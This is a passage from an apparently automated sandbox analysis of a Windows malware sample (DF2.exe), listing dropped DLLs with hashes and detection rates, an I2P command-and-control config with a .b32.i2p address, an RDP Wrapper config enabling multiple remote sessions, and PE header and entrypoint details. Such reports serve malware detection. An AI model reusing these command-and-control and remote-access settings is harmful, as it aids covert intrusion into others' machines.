Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) -> Done

C:\Windows\Temp\2s3EMNnh

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\Temp\5P46VR1V

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.236071662185895
Encrypted:	false
SSDEEP:	1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
MD5:	CE579A1BDCB9763DAFEBF01AD29F918C
SHA1:	F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
SHA-256:	0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
SHA-512:	EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Windows\Temp\6KasAPG0

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.193969228624904
Encrypted:	false
SSDEEP:	1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
MD5:	EC9499EE84ED09B77BE0A35EC87B781C
SHA1:	4148D40284BAB415DDB828BD4061A4FE93C9AF26
SHA-256:	5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
SHA-512:	D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f.................@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\DiEI7oU1

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2041507656664825
Encrypted:	false
SSDEEP:	1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
MD5:	CB4F460CF2921FCD35AC53F4154FCBE0
SHA1:	AFD91433EF0C03315739FB754B16D6C49D2E51F2
SHA-256:	D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
SHA-512:	BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Windows\Temp\DkzUMxZ8

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129536
Entropy (8bit):	6.2852879161990645
Encrypted:	false
SSDEEP:	1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
MD5:	88E6178B0CD434C8D14710355E78E691
SHA1:	F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
SHA-256:	7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
SHA-512:	C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."....<..........Y.........,...................................../....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Windows\Temp\LOQJSxPz

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.129024990254676
Encrypted:	false
SSDEEP:	6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
MD5:	7D88563AD41BAF4026CFC5D098CBF40D
SHA1:	442756834CCCEB84F219F3C762852437FBB3458E
SHA-256:	D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
SHA-512:	F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Windows\Temp\LcUJSdZq

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.285421743969757
Encrypted:	false
SSDEEP:	1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
MD5:	6E01ED70D02CE47F4D27762A9E949DEE
SHA1:	32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
SHA-256:	EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
SHA-512:	B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Windows\Temp\QSpUDeZs

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	75977
Entropy (8bit):	7.8696816318811385
Encrypted:	false
SSDEEP:	1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
MD5:	E53A179BB45CD7EDD8371740D65076BD
SHA1:	6B74034746E12C2058614A9DF671C31B79EAA7E9
SHA-256:	C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
SHA-512:	767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
Malicious:	false
Preview:	I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..\|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..\|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

C:\Windows\Temp\TYvLTq9l

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Windows\Temp\YERHbDgw

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Windows\Temp\Z8JRj7qu

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9:9
MD5:	006F29D8E822B9241020AEC2495EF819
SHA1:	6510BEB08A14B6BCC74D32031C1B19AA07169CF1
SHA-256:	69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
SHA-512:	16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
Malicious:	false
Preview:	wgNj

C:\Windows\Temp\ZNq9EaPU

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	456534
Entropy (8bit):	5.450314708570292
Encrypted:	false
SSDEEP:	1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
MD5:	AC8B2EA4A310D6748A8845C235A3CDC8
SHA1:	0B489969C7D95411E4104B9BB952C0024EDE1616
SHA-256:	77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
SHA-512:	0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Windows\Temp\bT51Gn7Q

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.25860377459178
Encrypted:	false
SSDEEP:	1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
MD5:	BD1D98C35FE2CB3E14A655AEDE9D4B01
SHA1:	49361C09F5A75A4E2D6E85FBDA337FC521770793
SHA-256:	961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
SHA-512:	74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\yGODxgsj

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.229119632298774
Encrypted:	false
SSDEEP:	1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
MD5:	7FEA520E80E7A73252F2A5C204BBF820
SHA1:	557D33F75805669A6D5E98D0E6CD3B790ECF3464
SHA-256:	64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
SHA-512:	6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465558328923521
Encrypted:	false
SSDEEP:	6144:xIXfpi67eLPU9skLmb0b4FWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbh:SXD94FWlLZMM6YFHx+h
MD5:	525B258046B1459A56BF8E1BA0932DBA
SHA1:	29A8E572951565B34662222E1DFA78C4B7D6EB4A
SHA-256:	774AF39C73307CF1F0693ED6A5E477151CA072337D8FE4543E6FBBAB65F55C82
SHA-512:	0E7907384241DC54B069C6B654CA5226387632FD3DC7FD9EB2F7D53413113F8188E0751B835B13636245197FC99E703A1C145DB5D8B9F318C619D7EB72604E66
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..$p\...............................................................................................................................................................................................................................................................................................................................................$..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.024900279611568
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	DF2.exe
File size:	8'630'784 bytes
MD5:	9b41d60958d07cdfd3cbc58fbb56cea7
SHA1:	da86bea1b0de55fed13464a374e2f724ce38aee7
SHA256:	7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d
SHA512:	7374b0beb3a493a9830c3e5797da38d5d02e171db6b890b43ed90f6031f3d455816af4b9a34b6bedbd8aae36785a62a68849e6e4e7383ea05c2a94e238dd6072
SSDEEP:	49152:9msYIP7Jzvi24hQ7UId5z3dxexnUSF4kPoJ8PnMX8Qodtd5yE+ghxR9scTQdZnK6:hZAIcTaKNeIo
TLSH:	D096293F62A5826DC25EC23EC0A3CF40D933B2761777C6E7629503A98F469C65E3E560
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

File Icon


Icon Hash:	6ab06e9aaaba8e50

Static PE Info

General

Entrypoint:	0xa9bac0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x6773E968 [Tue Dec 31 12:54:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	4b0c724426c4e106290c582a91355ce6

Entrypoint Preview

Instruction
push ebp
dec eax
sub esp, 20h
dec eax
mov ebp, esp
nop
dec eax
lea ecx, dword ptr [FFFECAA8h]
call 00007F25B8A24310h
dec eax
mov eax, dword ptr [000952FCh]
dec eax
mov ecx, dword ptr [eax]
call 00007F25B8CD9C61h
dec eax
mov eax, dword ptr [000952EDh]
dec eax
mov ecx, dword ptr [eax]
mov dl, 01h
call 00007F25B8CDC910h
dec eax
mov eax, dword ptr [000952DCh]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov edx, dword ptr [FFFEC402h]
dec esp
mov eax, dword ptr [0009596Bh]
call 00007F25B8CD9C63h
dec eax
mov eax, dword ptr [000952BFh]
dec eax
mov ecx, dword ptr [eax]
call 00007F25B8CD9E74h
call 00007F25B8A1B6CFh
jmp 00007F25B90A8E4Ah
nop
nop
call 00007F25B8A1B8C6h
nop
dec eax
lea esp, dword ptr [ebp+20h]
pop ebp
ret
dec eax
nop
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007F25B8A1ADDCh
dec eax
add esp, 28h
ret
int3
int3
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x744000	0x9b	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73d000	0x4c82	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7fd000	0x4f400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x79d000	0x5f6c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x747000	0x55740	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x746000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x73e3a0	0x11e8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x742000	0x1002	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x69ab50	0x69ac00	0e1d5edbdefa8470ed708e70ae316b79	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x69c000	0x958d8	0x95a00	e728ee24d2475cc66ceea5a73f8db69c	False	0.23265520572263992	data	4.773329918622991	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x732000	0xad4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x73d000	0x4c82	0x4e00	30d92391716b57610388a42d2f8980ae	False	0.24243790064102563	COM executable for DOS	4.288672591031705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x742000	0x1002	0x1200	13c09d90abeda5c97f7226fc0788cdea	False	0.23546006944444445	data	3.07062482119687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x744000	0x9b	0x200	ea9b5ef353f2b00f31694cdd665e9686	False	0.259765625	data	1.8837402034705306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x745000	0x370	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x746000	0x6d	0x200	086260e25d75ca00748a3e4927fc1c2e	False	0.1953125	data	1.3848831201957763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x747000	0x55740	0x55800	07eac7ae52f98002a01d33987cda8be8	False	0.4668739720394737	data	6.468825820983243	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata	0x79d000	0x5f6c4	0x5f800	577d45903ada91b9202065b15a9f1398	False	0.49365234375	data	6.46142748681637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
